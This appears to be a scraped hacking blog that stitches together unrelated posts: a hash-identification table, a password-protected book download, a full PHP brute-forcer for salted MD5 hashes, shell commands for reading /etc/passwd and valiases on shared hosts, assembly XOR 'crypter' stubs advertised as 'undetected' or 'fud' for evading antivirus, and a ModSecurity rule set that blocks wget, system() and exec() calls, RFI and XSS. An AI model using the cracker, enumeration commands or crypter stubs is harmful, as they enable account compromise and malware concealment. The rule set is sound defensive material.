RipeMD128: long: 32 only numbers and lowercase <g

RipeMD128 (Base64): long: 24 only numbers, lowercase, Uppercase, + ,/,., ends on ==

RipeMD128 (HMAC): long: 32 only numbers and lowercase <g

RipeMD160: long: 40 only numbers and lowercase <g

RipeMD160 (Base64): long: 28 only numbers, lowercase, Uppercase, + ,/,., ends on =

RipeMD160 (HMAC): long: 40 only numbers and lowercase <g

RipeMD256: long: 64 only numbers and lowercase <g

RipeMD256 (Base64): long: 44 only numbers, lowercase, Uppercase, + ,/,., ends on =

RipeMD256 (HMAC): long: 64 only numbers and lowercase <g

RipeMD320: long: 80 only numbers and lowercase <g

RipeMD320 (Base64): long: 56 only numbers, lowercase, Uppercase, + ,/,., ends on ==

RipeMD320 (HMAC): long: 80 only numbers and lowercase <g

SHA-0: long: 40 only numbers and lowercase <g

SHA-1: long: 40 only numbers and lowercase <g

SHA-1 (Base64): long: 28 only numbers, lowercase, Uppercase, + ,/,., ends on =

SHA-1 (HMAC): long: 40 only numbers and lowercase <g

SHA224: long: 56 only numbers and lowercase <g

SHA224 (Base64): long: 40 only numbers, lowercase, Uppercase, + ,/,., ends on ==

SHA224 (HMAC): long: 56 only numbers and lowercase <g

SHA256: long: 64 only numbers and lowercase <g

SHA256 (Base64): long: 44 only numbers, lowercase, Uppercase, + ,/,., ends on =

SHA256 (HMAC): long: 64 only numbers and lowercase <g

SHA384: long: 96 only numbers and lowercase <g

SHA384 (Base64): long: 64 only numbers, lowercase, Uppercase, + ,/,.

SHA384 (HMAC): long: 96 only numbers and lowercase <g

SHA512: long: 128 only numbers and lowercase <g

SHA512 (Base64): long: 88 only numbers, lowercase, Uppercase, + ,/,., ends on ==

SHA512 (HMAC): long: 128 only numbers and lowercase <g

SNEFRU128: long: 32 only numbers and lowercase <g

SNEFRU128 (Base64): long: 24 only numbers, lowercase, Uppercase, + ,/,., ends on ==

SNEFRU128 (HMAC): long: 32 only numbers and lowercase <g

SNEFRU256: long: 64 only numbers and lowercase <g

SNEFRU256 (Base64): long: 44 only numbers, lowercase, Uppercase, + ,/,., ends on =

SNEFRU256 (HMAC): long: 64 only numbers and lowercase <g

Tiger2: long: 48 only numbers and lowercase <g

Tiger128: long: 32 only numbers and lowercase <g

Tiger128 (Base64): long: 24 only numbers, lowercase, Uppercase, + ,/,., ends on ==

Tiger128 (HMAC): long: 32 only numbers and lowercase <g

Tiger160: long: 40 only numbers and lowercase <g

Tiger160 (Base64): long: 28 only numbers, lowercase, Uppercase, + ,/,., ends on =

Tiger160 (HMAC): long: 40 only numbers and lowercase <g

Tiger192: long: 48 only numbers and lowercase <g

Tiger192 (Base64): long: 32 only numbers, lowercase, Uppercase

Tiger192 (HMAC): long: 48 only numbers and lowercase <g

WHIRLPOOL: long: 128 only numbers and lowercase <g

WHIRLPOOL (Base64): long: 88 only numbers, lowercase, Uppercase, + ,/,., ends on ==

WHIRLPOOL (HMAC): long: 128 only numbers and lowercase <g

Whirlpool-0: long: 128 only numbers and lowercase <g

Whirlpool-1: long: 128 only numbers and lowercase <g

Whirlpool-2: long: 128 only numbers and lowercase <g

md5(md5($pass)): long: 32 only numbers and lowercase <g

md5(md5($pass).$salt): long: 32 only numbers and lowercase <g

md5(md5($salt).md5($pass)): long: 32 only numbers and lowercase <g

Windows-LM: long: 32 only numbers and Uppercase <G

Windows-NTLM: long: 32 only numbers and Uppercase <G

pass : e-omidfar.blogspot.com

Reverse Engineering Code with IDA Pro

page = 329

download = http://bl4ckh4t.persiangig.com/blog/Reverse%20Engineering%20Code%20with%20IDA%20Pro.rar

pass : e-omidfar.blogspot.com

Thursday, November 25, 2010

Md5(md5(salt)+md5(password)) Bruteforcer

<?php
set_time_limit(0); /////////////////////////////////////////////////
//
// md5(md5(salt) + md5(password)) bruteforcer
// coder: sp1r1t
// www.security-shell.com
// version: 1.0
// this script works only if hashing is done like this md5(md5(salt) + md5(password))
//
/////////////////////////////////////////////////

// INSERT YOUR HASH AND SALT HERE: $hash = ""; $salt = ""; // STEALTH MODE ON=1 OFF=0 (if stealth is ON, cpu usage will be low and normal, but bruteforcer will be slower, if stealth mode is OFF, cpu usage will be 100% but bruteforcer will be faster) $stealth = 0; //
// ARRAYS WITH CHARACTERS TO USE IN BRUTEFORCING PROCESS | IF YOU ADD YOUR ARRAY MAKE SURE YOU PUT IT IN ARRAY_MERGE FUNCTION TO JOIN THE OTHER ARRAYS $lower = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'); $numeric = array('0','1','2','3','4','5','6','7','8','9'); $upper = array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'); $GTFO = array_merge($lower, $numeric, $upper); //
// KEEP AWAY FROM THIS PIECE OF CODE IF YOU DON'T KNOW WHAT YOU'RE DOING $found = 0; $count = count($GTFO); $hash = strtolower($hash);
if(strlen($hash) == 32) { //----------------------------------------------1-------------------------------------------------- for($i1=0;$i1<$count;$i1++) {
 if(md5(md5($salt).md5($GTFO[$i1])) == $hash) {
  writetofile("$hash : ".$GTFO[$i1],$salt);
  $found = 1;
  break;
 }
 if($stealth == 1) usleep(1);
} //----------------------------------------------2-------------------------------------------------- if($found != 1)
 for($i20=0;$i20<$count;$i20++)
  for($i21=0;$i21<$count;$i21++) {
   if(md5(md5($salt).md5($GTFO[$i20].$GTFO[$i21])) == $hash) {
    writetofile("$hash : ".$GTFO[$i20].$GTFO[$i21],$salt);
    $found = 1;
    break;
   }
   if($stealth == 1) usleep(1);
  } //----------------------------------------------3-------------------------------------------------- if($found != 1)
 for($i30=0;$i30<$count;$i30++)
  for($i31=0;$i31<$count;$i31++)
   for($i32=0;$i32<$count;$i32++) {
    if(md5(md5($salt).md5($GTFO[$i30].$GTFO[$i31].$GTFO[$i32])) == $hash) {
     writetofile("$hash : ".$GTFO[$i30].$GTFO[$i31].$GTFO[$i32],$salt);
     $found = 1;
     break;
    }
    if($stealth == 1) usleep(1);
   } //----------------------------------------------4-------------------------------------------------- if($found != 1)
 for($i40=0;$i40<$count;$i40++)
  for($i41=0;$i41<$count;$i41++)
   for($i42=0;$i42<$count;$i42++)
    for($i43=0;$i43<$count;$i43++) {
     if(md5(md5($salt).md5($GTFO[$i40].$GTFO[$i41].$GTFO[$i42].$GTFO[$i43])) == $hash) {
      writetofile("$hash : ".$GTFO[$i40].$GTFO[$i41].$GTFO[$i42].$GTFO[$i43],$salt);
      $found = 1;
      break;
     }
     if($stealth == 1) usleep(1);
    } //----------------------------------------------5-------------------------------------------------- if($found != 1)
 for($i50=0;$i50<$count;$i50++)
  for($i51=0;$i51<$count;$i51++)
   for($i52=0;$i52<$count;$i52++)
    for($i53=0;$i53<$count;$i53++)
     for($i54=0;$i54<$count;$i54++) {
      if(md5(md5($salt).md5($GTFO[$i50].$GTFO[$i51].$GTFO[$i52].$GTFO[$i53].$GTFO[$i54])) == $hash) {
       writetofile("$hash : ".$GTFO[$i50].$GTFO[$i51].$GTFO[$i52].$GTFO[$i53].$GTFO[$i54],$salt);
       $found = 1;
       break;
      }
      if($stealth == 1) usleep(1);
     } //----------------------------------------------6-------------------------------------------------- if($found != 1)
 for($i60=0;$i60<$count;$i60++)
  for($i61=0;$i61<$count;$i61++)
   for($i62=0;$i62<$count;$i62++)
    for($i63=0;$i63<$count;$i63++)
     for($i64=0;$i64<$count;$i64++)
      for($i65=0;$i65<$count;$i65++) {
       if(md5(md5($salt).md5($GTFO[$i60].$GTFO[$i61].$GTFO[$i62].$GTFO[$i63].$GTFO[$i64].$GTFO[$i65])) == $hash) {
        writetofile("$hash : ".$GTFO[$i60].$GTFO[$i61].$GTFO[$i62].$GTFO[$i63].$GTFO[$i64].$GTFO[$i65],$salt);
        $found = 1;
        break;
       }
       if($stealth == 1) usleep(1);
      } //----------------------------------------------7-------------------------------------------------- if($found != 1)
 for($i70=0;$i70<$count;$i70++)
  for($i71=0;$i71<$count;$i71++)
   for($i72=0;$i72<$count;$i72++)
    for($i73=0;$i73<$count;$i73++)
     for($i74=0;$i74<$count;$i74++)
      for($i75=0;$i75<$count;$i75++)
       for($i76=0;$i76<$count;$i76++) {
        if(md5(md5($salt).md5($GTFO[$i70].$GTFO[$i71].$GTFO[$i72].$GTFO[$i73].$GTFO[$i74].$GTFO[$i75].$GTFO[$i76])) == $hash) {
         writetofile("$hash : ".$GTFO[$i70].$GTFO[$i71].$GTFO[$i72].$GTFO[$i73].$GTFO[$i74].$GTFO[$i75].$GTFO[$i76],$salt);
         $found = 1;
         break;
        }
        if($stealth == 1) usleep(1);
       } //----------------------------------------------8-------------------------------------------------- if($found != 1)
 for($i80=0;$i80<$count;$i80++)
  for($i81=0;$i81<$count;$i81++)
   for($i82=0;$i82<$count;$i82++)
    for($i83=0;$i83<$count;$i83++)
     for($i84=0;$i84<$count;$i84++)
      for($i85=0;$i85<$count;$i85++)
       for($i86=0;$i86<$count;$i86++)
        for($i87=0;$i87<$count;$i87++) {
         if(md5(md5($salt).md5($GTFO[$i80].$GTFO[$i81].$GTFO[$i82].$GTFO[$i83].$GTFO[$i84].$GTFO[$i85].$GTFO[$i86].$GTFO[$i87])) == $hash) {
          writetofile("$hash : ".$GTFO[$i80].$GTFO[$i81].$GTFO[$i82].$GTFO[$i83].$GTFO[$i84].$GTFO[$i85].$GTFO[$i86].$GTFO[$i87],$salt);
          $found = 1;
          break;
         }
         if($stealth == 1) usleep(1);
        } //----------------------------------------------9-------------------------------------------------- if($found != 1)
 for($i90=0;$i90<$count;$i90++)
  for($i91=0;$i91<$count;$i91++)
   for($i92=0;$i92<$count;$i92++)
    for($i93=0;$i93<$count;$i93++)
     for($i94=0;$i94<$count;$i94++)
      for($i95=0;$i95<$count;$i95++)
       for($i96=0;$i96<$count;$i96++)
        for($i97=0;$i97<$count;$i97++)
         for($i98=0;$i98<$count;$i98++) {
          if(md5(md5($salt).md5($GTFO[$i90].$GTFO[$i91].$GTFO[$i92].$GTFO[$i93].$GTFO[$i94].$GTFO[$i95].$GTFO[$i96].$GTFO[$i97].$GTFO[$i98])) == $hash) {
           writetofile("$hash : ".$GTFO[$i90].$GTFO[$i91].$GTFO[$i92].$GTFO[$i93].$GTFO[$i94].$GTFO[$i95].$GTFO[$i96].$GTFO[$i97].$GTFO[$i98],$salt);
           $found = 1;
           break;
          }
          if($stealth == 1) usleep(1);
         } //----------------------------------------------10------------------------------------------------- if($found != 1)
 for($i100=0;$i100<$count;$i100++)
  for($i101=0;$i101<$count;$i101++)
   for($i102=0;$i102<$count;$i102++)
    for($i103=0;$i103<$count;$i103++)
     for($i104=0;$i104<$count;$i104++)
      for($i105=0;$i105<$count;$i105++)
       for($i106=0;$i106<$count;$i106++)
        for($i107=0;$i107<$count;$i107++)
         for($i108=0;$i108<$count;$i108++)
          for($i109=0;$i109<$count;$i109++) {
           if(md5(md5($salt).md5($GTFO[$i100].$GTFO[$i101].$GTFO[$i102].$GTFO[$i103].$GTFO[$i104].$GTFO[$i105].$GTFO[$i106].$GTFO[$i107].$GTFO[$i108].$GTFO[$i109])) == $hash) {
            writetofile("$hash : ".$GTFO[$i100].$GTFO[$i101].$GTFO[$i102].$GTFO[$i103].$GTFO[$i104].$GTFO[$i105].$GTFO[$i106].$GTFO[$i107].$GTFO[$i108].$GTFO[$i109],$salt);
            $found = 1;
            break;
           }
           if($stealth == 1) usleep(1);
          } //----------------------------------------------END------------------------------------------------ if($found == 0) writetofile("$hash : hash not found");
}
function writetofile($string,$string2) {
 $file = fopen("Cracked.txt", "a") or die("error");
 fwrite($file, "salt : ".$string2."\n");
 fwrite($file, $string."\n");
 fclose($file);
} ?>

Bypass Read Users At /etc/passwd

awk -F: '{ print $1 }' /etc*/passwd | sort

---

awk -F: '{ print $1 " "$2 " " $3" "$4" "$5 " "$6" "$7" "}' /etc*/passwd | sort

---
cd /etc;cat passwd
--
cat /etc/valiases/xxx.com 

 awk -F":" '{ print "username: " $1 "\t\tuid:" $3 }' /etc/passwd  
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' 
ls -la /etc/valiases/site.com < you can show user of him

Asm Encryptor

//////////////////////////////////////////////
PUSHAD
MOV BL,88
NEG BL
ROR BL,4
NOT BL
XOR BL,AL
NOT BL
ROR BL,4
NEG BL
PUSH 1
PUSH 1
MOV EAX,{TOP}
INC BL
L013:
XOR [BYTE DS:EAX],BL
INC EAX
DEC EAX
INC EAX
CMP EAX,{END}
JLE L013
JMP OEP
POPAD
PUSH 1
PUSH 1
RETN

Xor Encryption Method Hazl0oh Method..

//////////////////////////////////////////////
Standart XOR Manual Undetected Methode
PUSHAD
MOV BL,88
NEG BL
ROR BL,4
NOT BL
XOR BL,AL
NOT BL
ROR BL,4
NEG BL
PUSH 1
PUSH 1
MOV EAX,{TOP}
INC BL
XOR [BYTE DS:EAX],BL
INC EAX
DEC EAX
INC EAX
CMP EAX,{END}
JLE (XOR [BYTE DS:EAX],BL Address)
JMP OEP
POPAD
PUSH 1
PUSH 1
RETN

//////////////////////////////////////////////
InTheComE Pack Methode
PUSH EAX [ N.E.P ]
PUSH ECX
PUSH ESP
PUSH EBP
PUSH 24
PUSH 21
PUSH [OEP]
CALL [ CALL ]
PUSH ESI
PUSH EBX
CALL ESI
CALL EBX
CALL ESP
CALL ECX
CALL EAX
PUSH 20
RETN

//////////////////////////////////////////////
Loop Crypting

mov eax, *TOP*
mov ecx, *länge*
ptr:
xor byte ptr[eax+ecx], *key*
loopd ptr

//////////////////////////////////////////////
Metamorph Crypting:

MOV EDX, TOP
MOV CL, 5
X: ADD [EDX], 5
XOR [EDX], 7
Y: SUB [EDX], 5
ADD CL, 2
MOV [X+2], CL
MOV [Y+2], CL
INC EDX
CMP EDX, END
JLE X

//////////////////////////////////////////////
ByPiT XoR
CMP AX,8
PUSH EAX
MOV EAX,EBP
PUSH (o.e.p)
PUSH 88
PUSH 77
PUSH (o.e.p)
CALL (call)

//////////////////////////////////////////////
UD
PUSH EBP
MOV EBP,ESP
MOV EAX,[Near PUSH EBP +10]
INC EAX
CMP EAX,EBP
SUB ESI,4
PUSH[Alter EP]
RETN

//////////////////////////////////////////////
Kolay bir xor
xor:PUSH EBP
MOV BL, 88
PUSH 99
XOR BL, AL
PUSH 1
PUSH 1
DEC EAX
JMP(push oep)
JLE(call oep)
RETN

//////////////////////////////////////////////
Güzel bir XOR
DEC ECX
DEC EAX
PUSH EBP
MOV EBP,ESP
PUSH (DEC ECX)
PUSH 99
PUSH 11
PUSH (DEC EAX)
PUSH (TOP PUSH )
CALL (TOP CALL )

//////////////////////////////////////////////
V.B için cok güzel BiR XoR
PUSH ESP
PUSH EBP
PUSH EDX
PUSH ECX
NEG EAX
PUSH(Orginal entrypoint)
CALL(orginal call entrypoint)
XCHG DH, CH
PUSH 3788
PUSH 3764
PUSH 3768
PUSH 3772
PUSH 3531
CALL EAX
CALL ESI
CALL EBX
NOT EAX
XOR EAX,EDI
XOR CH,DH
INC ESI
DEC EBP
CALL ESP
JMP (XOR EAX,EDI entrypoint)
JLE (XOR CH,DH Entrypoint)
ROR AL,6
NOT EAX
PUSH 0
RETN

//////////////////////////////////////////////
xor packing
PUSH EBP
MOV EBP, ESP
PUSH ESI
PUSH EDI
PUSH EBX
MOV ESI, ESP
PUSH DWORD PTR SS:[EBP+14]
PUSH DWORD PTR SS:[EBP+10]
PUSH DWORD PTR SS:[EBP+C]
CALL NEAR DWORD PTR SS:[EBP+8]
MOV ESP, ESI
POP EBX
POP EDI
POP ESI
POP EBP
RETN 10

//////////////////////////////////////////////
lods Routine ( xor ) MANUAL PACKING
xor eax, eax
xor ebx, ebx
mov esi, *start adress of your code to crypt*
mov edi, esi

start:
lodsb
add bl, 25 ; changeable!
add bh, 33 ; changeable!!
add ah, 23 ; changeable!!
add al, ah
xor al, bl
sub al, bh
stosb
cmp esi, *end adress of your code to crypt*
jle start
jmp OEP

thanks haZl0oh

//////////////////////////////////////////////
NEG_NOT_ROR Xor routine by haZl0oh
MOV BL,88
NEG BL
ROR BL,4
NOT BL
XOR BL,AL
NOT BL
ROR BL,4
NEG BL
MOV EAX, "start of your code to crypt"
INC BL
XOR BYTE PTR DS:[EAX],BL <<<<<<<<<<< *theseadress
INC EAX
CMP EAX,"end of your code to crypt"
JLE adress of *theseadress

<<<<<<<<<<<
any kind of jump to your OEP


//////////////////////////////////////////////
XOR Manual Undetected Methode
PUSHAD
MOV BL,88
NEG BL
ROR BL,4
NOT BL
XOR BL,AL
NOT BL
ROR BL,4
NEG BL
PUSH 1
PUSH 1
MOV EAX,{TOP}
INC BL
L013:
XOR [BYTE DS:EAX],BL
INC EAX
DEC EAX
INC EAX
CMP EAX,{END}
JLE L013
JMP OEP
POPAD
PUSH 1
PUSH 1
RETN

Xor Encryption Method Hazl0oh Method..
//////////////////////////////////////////////
OllyDbg Xor Packing Yöntemi
xor bl,bl
mov eax,(First)
inc bl
xor byte ptr ds:[eax],bl
inc eax
cmp eax,(Last)
jle (xor)
Push (OEP)
Call (JMP or CALL)

//////////////////////////////////////////////
Basit Bir x0r Packing [Tüm Dosyalarda Çalisir]
100040C2 PUSH EBP
100040C3 MOV EBP,88
100040C8 INC EBP
100040C9 SBB EBP,88
100040CF DEC EBP
100040D0 DEC EBP
100040D1 PUSH 88
100040D6 XOR EBP,88
100040DC TEST EBP,88
100040E2 NEG EBP
100040E4 ^ JLE SHORT stub.100040D6 ; jLe Xor Adress
100040E6 ^ JMP stub.<ModuleEntryPoint> ; Jmp Oep adress

Coded ByRodi



//////////////////////////////////////////////

new xor routine alost fud to some pe files !!!

start

add al,1a
add al,1
xor al,2
mov esi, *end of code which you wanna crypt*
dec al
dec al
xor byte ptr ds:[esi],al <<< addressImean
dec esi
dec esi
cmp esi, *start of code ya wanna crypt*
JGE adressImean
*any kind of jump*
call oep
ret

//////////////////////////////////////////////
Encryption Routine
mov eax,0040129c
xor byte [eax],0f
inc eax
cmp eax,0040E46C
jle [xor address]

blue host mod sec

# modsec-00.00-defaults.conf

SecFilterEngine On
SecAuditEngine Off
SecFilterCheckUnicodeEncoding Off
SecFilterCheckCookieFormat On
SecFilterScanPOST On
SecFilterDefaultAction "deny,log,status:503"
SecFilterSelective REMOTE_ADDR "^127\.0\.0\.1$" nolog,allow

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-00.00-whitelists.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilter "_vti_bin" allow
SecFilterSelective THE_REQUEST "/fpsrvadm\.exe" "nolog,pass"
SecFilterSelective THE_REQUEST "/fpremadm\.exe" "nolog,pass"
SecFilterSelective THE_REQUEST "/admisapi/fpadmin\.htm" "nolog,pass"
SecFilterSelective THE_REQUEST "/scripts/Fpadmcgi\.exe" "nolog,pass"
SecFilterSelective THE_REQUEST "/_private/orders\.txt" "nolog,pass"
SecFilterSelective THE_REQUEST "/_private/form_results\.txt" "nolog,pass"
SecFilterSelective THE_REQUEST "/_private/registrations\.htm" "nolog,pass"
SecFilterSelective THE_REQUEST "/cfgwiz\.exe" "nolog,pass"
SecFilterSelective THE_REQUEST "/authors\.pwd" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_bin/_vti_aut/author\.exe" "nolog,pass"
SecFilterSelective THE_REQUEST "/administrators\.pwd" "nolog,pass"
SecFilterSelective THE_REQUEST "/_private/form_results\.htm" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_pvt/access\.cnf" "nolog,pass"
SecFilterSelective THE_REQUEST "/_private/register\.txt" "nolog,pass"
SecFilterSelective THE_REQUEST "/_private/registrations\.txt" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_pvt/service\.cnf" "nolog,pass"
SecFilterSelective THE_REQUEST "/service\.pwd" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_pvt/service\.stp" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_pvt/services\.cnf" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_bin/shtml\.exe" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_pvt/svcacl\.cnf" "nolog,pass"
SecFilterSelective THE_REQUEST "/users\.pwd" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_pvt/writeto\.cnf" "nolog,pass"
SecFilterSelective THE_REQUEST "/dvwssr\.dll" "nolog,pass"
SecFilterSelective THE_REQUEST "/_private/register\.htm" "nolog,pass"
SecFilterSelective THE_REQUEST "/_vti_bin/" "nolog,pass"
SecFilterSelective REQUEST_URI "/mailman/admin/" "pass,nolog"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-00.general.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilter "\<.*php .*\(.*\)\;system\(.*\).*php*\>"
SecFilter "\<.*php .*\(.*\)\;(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|posix.pwd|dl|phpinfo)\(.*\).*php*\>"
SecFilter "wget\x20" "rev:1,severity:5,msg:'Attempted use of wGet'"
SecFilter "uname\x20-a" "rev:1,severity:5,msg:'Attempted use of uname -a'"
SecFilterSelective REQUEST_URI "gcc\x20" "rev:1,severity:5,msg:'Attempted use of gcc'"
SecFilter "Bcc:" "rev:1,severity:5,msg:'Attempted BCC spam'"
SecFilter "Bcc:\x20" "rev:1,severity:5,msg:'Attempted BCC spam'"
SecFilterSelective ARG_server_inc "(\.\.|(http|https|ftp)\:/)" "rev:1,severity:5,msg:'Attempted RFI'"
SecFilterSelective THE_REQUEST "system\(" "rev:1,severity:5,msg:'Attempted use of system()'"
SecFilterSelective THE_REQUEST "exec\(" "rev:1,severity:5,msg:'Attempted use of exec()'"
SecFilterSelective THE_REQUEST "popen\(" "rev:1,severity:5,msg:'Attempted use of popen()'"
SecFilterSelective THE_REQUEST "passthru\(" "rev:1,severity:5,msg:'Attempted use of passthru()'"
SecFilterSelective THE_REQUEST "albacrew"
SecFilterSelective ARG_dir[inc] "(\.\.|(http|https|ftp)\:/)" "rev:1,severity:5,msg:'RFI: dir[inc]=http'"
SecFilterSelective ARG__PHPLIB[libdir] "(\.\.|(http|https|ftp)\:/)" "rev:1,severity:5,msg:'RFI: PHPLIB[libdir]'"
SecFilterSelective REQUEST_URI "/\.htgroup" "rev:1,severity:5,msg:'Direct read of .htgroup'"
SecFilterSelective REQUEST_URI "/\.htaccess" "rev:1,severity:5,msg:'Direct read of .htaccess'"
SecFilterSelective REQUEST_URI "cd\.\." "rev:1,severity:5,msg:'Possible directory traversal attempt'"
SecFilterSelective THE_REQUEST "///cgi-bin"
SecFilterSelective THE_REQUEST "/cgi-bin///"
SecFilterSelective REQUEST_URI "/~root" "rev:1,severity:5,msg:'Restricted userdir: root'"
SecFilterSelective REQUEST_URI "/~ftp" "rev:1,severity:5,msg:'Restricted userdir: root'"
SecFilterSelective REQUEST_URI "/htgrep" log,pass
SecFilterSelective REQUEST_URI "/\.history" "rev:1,severity:5,msg:'Restricted file: .history'"
SecFilterSelective REQUEST_URI "/\.bash_history" "rev:1,severity:5,msg:'Restricted file: .bash_history'"
SecFilterSelective REQUEST_URI "/~nobody" "rev:1,severity:5,msg:'Restricted homedir: nobody'"
SecFilterSelective THE_REQUEST "<script"
SecFilterSelective REQUEST_URI "cmd=cd\x20/var"
SecFilterSelective ARG_dir "(http|https|ftp)\:/" "rev:1,severity:5,msg:'RFI dir'"
SecFilterSelective REQUEST_URI "\?STRENGUR"
SecFilterSelective REQUEST_URI "/etc/motd"
SecFilterSelective REQUEST_URI "/etc/passwd"
SecFilterSelective THE_REQUEST "/conf/httpd\.conf"
SecFilterSelective REQUEST_URI "/bin/ps"
SecFilterSelective THE_REQUEST "bin/tclsh"
SecFilterSelective THE_REQUEST "tclsh8\x20"
SecFilterSelective THE_REQUEST "udp\.pl"
SecFilterSelective THE_REQUEST "linuxdaybot\.txt"
SecFilterSelective REQUEST_URI "wget\x20"
SecFilterSelective THE_REQUEST "bin/nasm"
SecFilterSelective THE_REQUEST "nasm\x20"
SecFilterSelective REQUEST_URI "/usr/bin/perl"
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-(charset|width) "
SecFilterSelective THE_REQUEST "links (http|https|ftp)\:/"
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "cd\x20/(tmp|var/tmp|etc/httpd/proxy|dev/shm)"
SecFilterSelective THE_REQUEST "cd\.\."
SecFilterSelective THE_REQUEST "///cgi-bin"
SecFilterSelective THE_REQUEST "/cgi-bin///"
SecFilterSelective REQUEST_URI "/~named/"
SecFilterSelective REQUEST_URI "/~guest/"
SecFilterSelective REQUEST_URI "/~logs/"
SecFilterSelective REQUEST_URI "/~sshd/"
SecFilterSelective REQUEST_URI "/~ftp/"
SecFilterSelective REQUEST_URI "/~bin/"
SecFilterSelective REQUEST_URI "/~nobody/"
SecFilterSelective REQUEST_URI "/\.history"
SecFilterSelective REQUEST_URI "/\.bash_history"
SecFilterSelective REQUEST_URI "/nessus_is_probing_you_"
SecFilterSelective REQUEST_URI "/NessusTest"
SecFilter "javascript\://"
SecFilter "img src=javascript"
SecFilter "hdr=/"
SecFilterSelective REQUEST_METHOD "^POST$" "chain,rev:1,severity:5,msg:'POST with no Content-Length'"
SecFilterSelective HTTP_Content-Length "^$"
SecFilterSelective HTTP_Transfer-Encoding "!^$"
SecFilterSelective THE_REQUEST "\<IMG.*/\bonerror\b[\s]*=/Ri"
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]text\/javascript/i"
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]application\/x-javascript/i"
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]text\/jscript/i"
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]text\/vbscript/i"
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]application\/x-vbscript/i"
SecFilterSelective THE_REQUEST "TYPE\s*=\s*[\'\"]text\/ecmascript/i"
SecFilterSelective THE_REQUEST "STYLE[\s]*=[\s]*[^>]expression[\s]*\(/i"
SecFilterSelective THE_REQUEST "[\s]*expression[\s]*\([^}]}[\s]*<\/STYLE>/i"
SecFilterSelective THE_REQUEST "<!\[CDATA\[<\]\]>SCRIPT"
SecFilterSelective THE_REQUEST "Content-Type\:.*(<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>|onmouseover=|javascript\:)" "rev:1,severity:5,msg:'XSS: Content-Type'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-00.useragents.conf: 2008-05-12 11:55:38.000000000 

SecFilterSelective HTTP_USER_AGENT "S\.T\.A\.L\.K\.E\.R\." "rev:1,deny,id:HGUA200701,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "NeuralBot/0\.2" "rev:1,deny,id:HGUA200702,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "Kenjin Spider" "rev:1,deny,id:HGUA200703,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "WebVulnScan" "rev:1,deny,id:HGUA200704,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "Internet-exprorer" "rev:1,deny,id:HGUA200705,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "Mozilla.*Nessus" "rev:1,deny,id:HGUA200706,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "Indy Library" "rev:1,deny,id:HGUA200707,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "Faxobot" "rev:1,deny,id:HGUA200708,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT ".*SAFEXPLORER TL" "rev:1,deny,id:HGUA200709,severity:2,msg:'Exploit UA'"
SecFilterSelective HTTP_USER_AGENT "^libwww-perl/.*" "chain,rev:1,id:HG2007072020,deny:503,severity:5,msg:'HG: libwww UA with RFI'"
SecFilterSelective REQUEST_URI "=(\.\.|http|https|ftp)\:"
SecFilterSelective HTTP_USER_AGENT "INTERNET EXPLOITER SUX" "rev:1,deny,id:HGUA200710,severity:2,msg:'Bad Script UA'"
SecFilterSelective HTTP_USER_AGENT "Windows-Update-Agent" "rev:1,deny,id:HGUA200711,severity:2,msg:'Bad Script UA'"
SecFilterSelective HTTP_USER_AGENT "PMAFind" "rev:1,deny,id:HGUA200712,severity:2,msg:'Bad Script UA'"
SecFilterSelective HTTP_USER_AGENT "Crescent Internet ToolPak" "rev:1,deny,id:HGUA200713,severity:2,msg:'Bad Script UA'"
SecFilterSelective HTTP_USER_AGENT "CopyRightCheck" "rev:1,deny,id:HGUA200714,severity:2,msg:'Copyright Bots'"
SecFilterSelective HTTP_USER_AGENT "CopyGuard" "rev:1,deny,id:HGUA200715,severity:2,msg:'Copyright Bots'"
SecFilterSelective HTTP_USER_AGENT "Digimarc WebReader" "rev:1,deny,id:HGUA200716,severity:2,msg:'Copyright Bots'"
SecFilterSelective HTTP_USER_AGENT "Web Downloader" "rev:1,deny,id:HGUA200717,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT WebZIP "rev:1,deny,id:HGUA200718,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT WebCopier "rev:1,deny,id:HGUA200719,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT Webster "rev:1,deny,id:HGUA200720,severity:2,msg:'Web Leech UA'"
